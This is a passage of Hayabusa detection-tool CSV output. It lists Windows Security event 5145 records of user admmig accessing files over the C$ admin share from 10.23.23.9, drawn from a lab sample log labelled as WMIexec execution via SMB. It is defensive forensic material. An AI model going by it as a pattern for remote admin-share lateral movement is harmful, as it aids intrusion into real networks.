Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.652 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.683 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.699 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.714 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.714 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.714 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.730 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.746 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.764 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 